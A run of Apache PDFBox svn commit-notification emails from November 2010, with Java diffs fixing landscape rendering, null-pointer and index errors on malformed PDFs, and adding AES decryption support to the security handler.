mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Nov 2010 22:40:43 -0000 Received: (qmail 44380 invoked by uid 500); 19 Nov 2010 22:41:14 -0000 Delivered-To: [email protected] Received: (qmail 44351 invoked by uid 500); 19 Nov 2010 22:41:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44344 invoked by uid 99); 19 Nov 2010 22:41:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Nov 2010 22:41:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Nov 2010 22:41:12 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A4A3523889F7; Fri, 19 Nov 2010 22:39:57 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037067 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java Date: Fri, 19 Nov 2010 22:39:57 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Fri Nov 19 22:39:57 2010 New Revision: 1037067 URL: http://svn.apache.org/viewvc?rev=1037067&view=rev Log: PDFBOX-896: PDFViewer doesn't render landscape mode correctly Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java?rev=1037067&r1=1037066&r2=1037067&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfviewer/PDFPagePanel.java Fri Nov 19 22:39:57 2010 @@ -18,6 +18,7 @@ package org.apache.pdfbox.pdfviewer; import java.awt.Dimension; import java.awt.Graphics; +import java.awt.Graphics2D; import java.io.IOException; @@ -39,6 +40,7 @@ public class PDFPagePanel extends JPanel private PDPage page; private PageDrawer drawer = null; private Dimension pageDimension = null; + private Dimension drawDimension = null; /** * Constructor. @@ -59,7 +61,16 @@ public class PDFPagePanel extends JPanel { page = pdfPage; PDRectangle pageSize = page.findMediaBox(); - pageDimension = pageSize.createDimension(); + drawDimension = pageSize.createDimension(); + int rotation = page.findRotation(); + if (rotation == 90 || rotation == 270) + { + pageDimension = new Dimension(drawDimension.height, drawDimension.width); + } + else + { + pageDimension = drawDimension; + } setSize( pageDimension ); setBackground( java.awt.Color.white ); } @@ -73,7 +84,16 @@ public class PDFPagePanel extends JPanel { g.setColor( getBackground() ); g.fillRect( 0, 0, getWidth(), getHeight() ); - drawer.drawPage( g, page, pageDimension ); + + int rotation = page.findRotation(); + if (rotation == 90 || rotation == 270) + { + Graphics2D g2D = (Graphics2D)g; + g2D.translate(pageDimension.getWidth(), 0.0f); + g2D.rotate(Math.toRadians(rotation)); + } + + drawer.drawPage( g, page, drawDimension ); } catch( IOException e ) { From [email protected] Fri Nov 19 22:43:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40067 invoked from network); 19 Nov 2010 22:43:24 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Nov 2010 22:43:24 -0000 Received: (qmail 48540 invoked by uid 500); 19 Nov 2010 22:43:55 -0000 Delivered-To: [email protected] Received: (qmail 48522 invoked by uid 500); 19 Nov 2010 22:43:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48515 invoked by uid 99); 19 Nov 2010 22:43:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Nov 2010 22:43:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Nov 2010 22:43:53 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7BE0323889F7; Fri, 19 Nov 2010 22:42:38 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037069 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java Date: Fri, 19 Nov 2010 22:42:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Fri Nov 19 22:42:38 2010 New Revision: 1037069 URL: http://svn.apache.org/viewvc?rev=1037069&view=rev Log: PDFBOX-891: Malformed document causes NPE in PDNameTreeNode.getValue Patch courtesy of Kevin Jackson Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java?rev=1037069&r1=1037068&r2=1037069&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDNameTreeNode.java Fri Nov 19 22:42:38 2010 @@ -23,6 +23,8 @@ import java.util.Collections; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; import org.apache.pdfbox.cos.COSArray; import org.apache.pdfbox.cos.COSBase; @@ -39,6 +41,7 @@ import org.apache.pdfbox.cos.COSString; */ public class PDNameTreeNode implements COSObjectable { + private static final Log log = LogFactory.getLog(PDNameTreeNode.class); private COSDictionary node; private Class valueType = null; @@ -147,15 +150,22 @@ public class PDNameTreeNode implements C else { List kids = getKids(); - for( int i=0; i<kids.size() && retval == null; i++ ) + if (kids != null) { - PDNameTreeNode childNode = (PDNameTreeNode)kids.get( i ); - if( childNode.getLowerLimit().compareTo( name ) <= 0 && - childNode.getUpperLimit().compareTo( name ) >= 0 ) + for( int i=0; i<kids.size() && retval == null; i++ ) { - retval = childNode.getValue( name ); + PDNameTreeNode childNode = (PDNameTreeNode)kids.get( i ); + if( childNode.getLowerLimit().compareTo( name ) <= 0 && + childNode.getUpperLimit().compareTo( name ) >= 0 ) + { + retval = childNode.getValue( name ); + } } } + else + { + log.warn("NameTreeNode does not have \"names\" nor \"kids\" objects."); + } } return retval; } From [email protected] Mon Nov 22 21:12:28 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91150 invoked from network); 22 Nov 2010 21:12:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Nov 2010 21:12:27 -0000 Received: (qmail 53387 invoked by uid 500); 22 Nov 2010 21:12:59 -0000 Delivered-To: [email protected] Received: (qmail 53360 invoked by uid 500); 22 Nov 2010 21:12:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53347 invoked by uid 99); 22 Nov 2010 21:12:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:12:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:12:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5DD8B2388A38; Mon, 22 Nov 2010 21:11:24 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037891 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Date: Mon, 22 Nov 2010 21:11:24 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Mon Nov 22 21:11:23 2010 New Revision: 1037891 URL: http://svn.apache.org/viewvc?rev=1037891&view=rev Log: PDFBOX-897: NullPointerException PDFFont#getEncodingFromFont with a PDF book because Type1Encoding is null Patch by Martijn Brinkers with logging added by Adam Nichols. Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java?rev=1037891&r1=1037890&r2=1037891&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Mon Nov 22 21:11:23 2010 @@ -801,7 +801,7 @@ public abstract class PDFont implements } if (line.startsWith("/Encoding")) { - if(line.endsWith("array")) + if(line.contains("array")) { StringTokenizer st = new StringTokenizer(line); // ignore the first token @@ -829,7 +829,10 @@ public abstract class PDFont implements st.nextElement(); int index = Integer.parseInt(st.nextToken()); String name = st.nextToken(); - encoding.addCharacterEncoding(index, name.replace("/", "")); + if(encoding == null) + log.warn("Unable to get character encoding. Encoding defintion found without /Encoding line."); + else + encoding.addCharacterEncoding(index, name.replace("/", "")); } } in.close(); From [email protected] Mon Nov 22 21:20:25 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94423 invoked from network); 22 Nov 2010 21:20:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Nov 2010 21:20:20 -0000 Received: (qmail 67780 invoked by uid 500); 22 Nov 2010 21:20:51 -0000 Delivered-To: [email protected] Received: (qmail 67757 invoked by uid 500); 22 Nov 2010 21:20:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67750 invoked by uid 99); 22 Nov 2010 21:20:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:20:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:20:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 21D6C2388A4B; Mon, 22 Nov 2010 21:19:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037894 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java Date: Mon, 22 Nov 2010 21:19:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Mon Nov 22 21:19:19 2010 New Revision: 1037894 URL: http://svn.apache.org/viewvc?rev=1037894&view=rev Log: PDFBOX-898: COSStreamArray NullPointerException. firstStream is null if COSArray contains no items Patch contributed by Martijn Brinkers Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java?rev=1037894&r1=1037893&r2=1037894&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDStream.java Mon Nov 22 21:19:19 2010 @@ -164,7 +164,9 @@ public class PDStream implements COSObje } else if( base instanceof COSArray ) { - retval = new PDStream( new COSStreamArray( (COSArray)base ) ); + if (((COSArray)base).size() > 0) { + retval = new PDStream( new COSStreamArray( (COSArray)base ) ); + } } else { From [email protected] Mon Nov 22 21:49:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9187 invoked from network); 22 Nov 2010 21:49:53 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Nov 2010 21:49:53 -0000 Received: (qmail 15971 invoked by uid 500); 22 Nov 2010 21:50:25 -0000 Delivered-To: [email protected] Received: (qmail 15945 invoked by uid 500); 22 Nov 2010 21:50:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15938 invoked by uid 99); 22 Nov 2010 21:50:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:50:25 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 21:50:24 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E6E5A23889E9; Mon, 22 Nov 2010 21:48:52 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037900 - in /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption: SecurityHandler.java StandardSecurityHandler.java Date: Mon, 22 Nov 2010 21:48:52 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Mon Nov 22 21:48:52 2010 New Revision: 1037900 URL: http://svn.apache.org/viewvc?rev=1037900&view=rev Log: PDFBOX-872: ERROR org.apache.pdfbox.filter.FlateFilter - Stop reading corrupt stream Patch contributed by Martijn Brinkers with a small addition for backward compatibility by Adam Nichols. Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/StandardSecurityHandler.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java?rev=1037900&r1=1037899&r2=1037900&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java Mon Nov 22 21:48:52 2010 @@ -22,6 +22,8 @@ import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; +import java.security.InvalidAlgorithmParameterException; +import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.util.HashSet; @@ -30,6 +32,13 @@ import java.util.List; import java.util.Map; import java.util.Set; +import javax.crypto.Cipher; +import javax.crypto.CipherInputStream; +import javax.crypto.NoSuchPaddingException; +import javax.crypto.SecretKey; +import javax.crypto.spec.IvParameterSpec; +import javax.crypto.spec.SecretKeySpec; + import org.apache.pdfbox.cos.COSArray; import org.apache.pdfbox.cos.COSBase; import org.apache.pdfbox.cos.COSDictionary; @@ -39,6 +48,7 @@ import org.apache.pdfbox.cos.COSStream; import org.apache.pdfbox.cos.COSString; import org.apache.pdfbox.encryption.ARCFour; import org.apache.pdfbox.exceptions.CryptographyException; +import org.apache.pdfbox.exceptions.WrappedIOException; import org.apache.pdfbox.pdmodel.PDDocument; /** @@ -60,6 +70,11 @@ public abstract class SecurityHandler private static final int DEFAULT_KEY_LENGTH = 40; + /* + * See 7.6.2, page 58, PDF 32000-1:2008 + */ + private final static byte[] AES_SALT = {(byte) 0x73, (byte) 0x41, (byte) 0x6c, (byte) 0x54}; + /** * The value of V field of the Encryption dictionary. */ @@ -90,6 +105,11 @@ public abstract class SecurityHandler private Set potentialSignatures = new HashSet(); + /* + * If true, AES will be used + */ + private boolean aes; + /** * The access permission granted to the current user for the document. These * permissions are computed during decryption and are in read only mode. @@ -167,6 +187,26 @@ public abstract class SecurityHandler } } + /** + * Encrypt a set of data. + * + * @param objectNumber The data object number. + * @param genNumber The data generation number. + * @param data The data to encrypt. + * @param output The output to write the encrypted data to. + * @throws CryptographyException If there is an error during the encryption. + * @throws IOException If there is an error reading the data. + * @depricated While this works fine for RC4 encryption, it will never decrypt AES data + * You should use encryptData(objectNumber, genNumber, data, output, decrypt) + * which can do everything. This function is just here for compatibility + * reasons and will be removed in the future. + */ + public void encryptData(long objectNumber, long genNumber, InputStream data, OutputStream output) + throws CryptographyException, IOException + { + // default to encrypting since the function is named "encryptData" + encryptData(objectNumber, genNumber, data, output, false); + } /** * Encrypt a set of data. @@ -175,12 +215,13 @@ public abstract class SecurityHandler * @param genNumber The data generation number. * @param data The data to encrypt. * @param output The output to write the encrypted data to. + * @param decrypt true to decrypt the data, false to encrypt it * * @throws CryptographyException If there is an error during the encryption. * @throws IOException If there is an error reading the data. */ - public void encryptData(long objectNumber, long genNumber, InputStream data, OutputStream output) - throws CryptographyException, IOException + public void encryptData(long objectNumber, long genNumber, InputStream data, OutputStream output, boolean decrypt) + throws CryptographyException, IOException { byte[] newKey = new byte[ encryptionKey.length + 5 ]; System.arraycopy( encryptionKey, 0, newKey, 0, encryptionKey.length ); @@ -201,7 +242,11 @@ public abstract class SecurityHandler try { MessageDigest md = MessageDigest.getInstance( "MD5" ); - digestedKey = md.digest( newKey ); + md.update(newKey); + if (aes) { + md.update(AES_SALT); + } + digestedKey = md.digest(); } catch( NoSuchAlgorithmException e ) { @@ -213,13 +258,57 @@ public abstract class SecurityHandler byte[] finalKey = new byte[ length ]; System.arraycopy( digestedKey, 0, finalKey, 0, length ); - rc4.setKey( finalKey ); - rc4.write( data, output ); + if (aes) + { + byte[] iv = new byte[16]; + + data.read(iv); + + try { + Cipher decryptCipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); + + SecretKey aesKey = new SecretKeySpec(finalKey, "AES"); + + IvParameterSpec ips = new IvParameterSpec(iv); + + decryptCipher.init(decrypt ? Cipher.DECRYPT_MODE : Cipher.ENCRYPT_MODE, aesKey, ips); + + CipherInputStream cipherStream = new CipherInputStream(data, decryptCipher); + + try { + byte buffer[] = new byte[4096]; + long count = 0L; + for(int n = 0; -1 != (n = cipherStream.read(buffer));) + { + output.write(buffer, 0, n); + count += n; + } + } + finally { + cipherStream.close(); + } + } + catch (InvalidKeyException e) { + throw new WrappedIOException(e); + } + catch (InvalidAlgorithmParameterException e) { + throw new WrappedIOException(e); + } + catch (NoSuchAlgorithmException e) { + throw new WrappedIOException(e); + } + catch (NoSuchPaddingException e) { + throw new WrappedIOException(e); + } + } + else { + rc4.setKey( finalKey ); + rc4.write( data, output ); + } + output.flush(); - } - - + /** * This will decrypt an object in the document. * @@ -291,7 +380,8 @@ public abstract class SecurityHandler encryptData( objNum, genNum, encryptedStream, - stream.createFilteredStream() ); + stream.createFilteredStream(), + true /* decrypt */); } /** @@ -313,7 +403,8 @@ public abstract class SecurityHandler encryptData( objNum, genNum, encryptedStream, - stream.createFilteredStream() ); + stream.createFilteredStream(), + false /* encrypt */); } /** @@ -357,7 +448,7 @@ public abstract class SecurityHandler { ByteArrayInputStream data = new ByteArrayInputStream( string.getBytes() ); ByteArrayOutputStream buffer = new ByteArrayOutputStream(); - encryptData( objNum, genNum, data, buffer ); + encryptData( objNum, genNum, data, buffer, true /* decrypt */ ); string.reset(); string.append( buffer.toByteArray() ); } @@ -411,4 +502,18 @@ public abstract class SecurityHandler { return currentAccessPermission; } + + /* + * True if AES is used for encryption and decryption. + */ + public boolean isAES() { + return aes; + } + + /* + * Set to true if AES for encryption and decryption should be used. + */ + public void setAES(boolean aes) { + this.aes = aes; + } } Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/StandardSecurityHandler.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/StandardSecurityHandler.java?rev=1037900&r1=1037899&r2=1037900&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/StandardSecurityHandler.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/StandardSecurityHandler.java Mon Nov 22 21:48:52 2010 @@ -24,6 +24,7 @@ import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import org.apache.pdfbox.cos.COSArray; +import org.apache.pdfbox.cos.COSName; import org.apache.pdfbox.cos.COSString; import org.apache.pdfbox.encryption.ARCFour; import org.apache.pdfbox.exceptions.CryptographyException; @@ -232,6 +233,20 @@ public class StandardSecurityHandler ext "Error: The supplied password does not match either the owner or user password in the document." ); } + // detect whether AES encryption is used. This assumes that the encryption algo is + // stored in the PDCryptFilterDictionary + PDCryptFilterDictionary stdCryptFilterDictionary = doc.getEncryptionDictionary(). + getStdCryptFilterDictionary(); + + if (stdCryptFilterDictionary != null) + { + COSName cryptFilterMethod = stdCryptFilterDictionary.getCryptFilterMethod(); + + if (cryptFilterMethod != null) { + setAES("AESV2".equalsIgnoreCase(cryptFilterMethod.getName())); + } + } + this.proceedDecryption(); } From [email protected] Mon Nov 22 22:14:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27398 invoked from network); 22 Nov 2010 22:14:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Nov 2010 22:14:38 -0000 Received: (qmail 64620 invoked by uid 500); 22 Nov 2010 22:15:06 -0000 Delivered-To: [email protected] Received: (qmail 64603 invoked by uid 500); 22 Nov 2010 22:15:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64573 invoked by uid 99); 22 Nov 2010 22:15:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 22:15:06 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Nov 2010 22:15:05 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A09C92388A4B; Mon, 22 Nov 2010 22:13:34 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1037914 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java Date: Mon, 22 Nov 2010 22:13:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Mon Nov 22 22:13:34 2010 New Revision: 1037914 URL: http://svn.apache.org/viewvc?rev=1037914&view=rev Log: PDFBOX-872: ERROR org.apache.pdfbox.filter.FlateFilter - Stop reading corrupt stream Fixed type-o Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java?rev=1037914&r1=1037913&r2=1037914&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/encryption/SecurityHandler.java Mon Nov 22 22:13:34 2010 @@ -196,7 +196,7 @@ public abstract class SecurityHandler * @param output The output to write the encrypted data to. * @throws CryptographyException If there is an error during the encryption. * @throws IOException If there is an error reading the data. - * @depricated While this works fine for RC4 encryption, it will never decrypt AES data + * @deprecated While this works fine for RC4 encryption, it will never decrypt AES data * You should use encryptData(objectNumber, genNumber, data, output, decrypt) * which can do everything. This function is just here for compatibility * reasons and will be removed in the future. From [email protected] Tue Nov 23 17:36:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32481 invoked from network); 23 Nov 2010 17:36:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 23 Nov 2010 17:36:36 -0000 Received: (qmail 39940 invoked by uid 500); 23 Nov 2010 17:37:08 -0000 Delivered-To: [email protected] Received: (qmail 39913 invoked by uid 500); 23 Nov 2010 17:37:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39892 invoked by uid 99); 23 Nov 2010 17:37:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:37:07 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:37:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 64FBF2388A32; Tue, 23 Nov 2010 17:35:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1038216 - in /pdfbox/trunk/pdfbox/src: main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java test/resources/org/apache/pdfbox/pdmodel/page_label.pdf Date: Tue, 23 Nov 2010 17:35:35 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Tue Nov 23 17:35:34 2010 New Revision: 1038216 URL: http://svn.apache.org/viewvc?rev=1038216&view=rev Log: PDFBOX-900: ArrayIndexOutOfBoundsException with extracting labels from malformed document Patch contributed by Kevin Jackson, test case added by Adam Nichols Added: pdfbox/trunk/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf (with props) Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java?rev=1038216&r1=1038215&r2=1038216&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java Tue Nov 23 17:35:34 2010 @@ -108,7 +108,8 @@ public class PDPageLabels implements COS Map<Integer, COSDictionary> numbers = node.getNumbers(); for (Entry<Integer, COSDictionary> i : numbers.entrySet()) { - labels.put(i.getKey(), new PDPageLabelRange(i.getValue())); + if(i.getKey() >= 0) + labels.put(i.getKey(), new PDPageLabelRange(i.getValue())); } } } Modified: 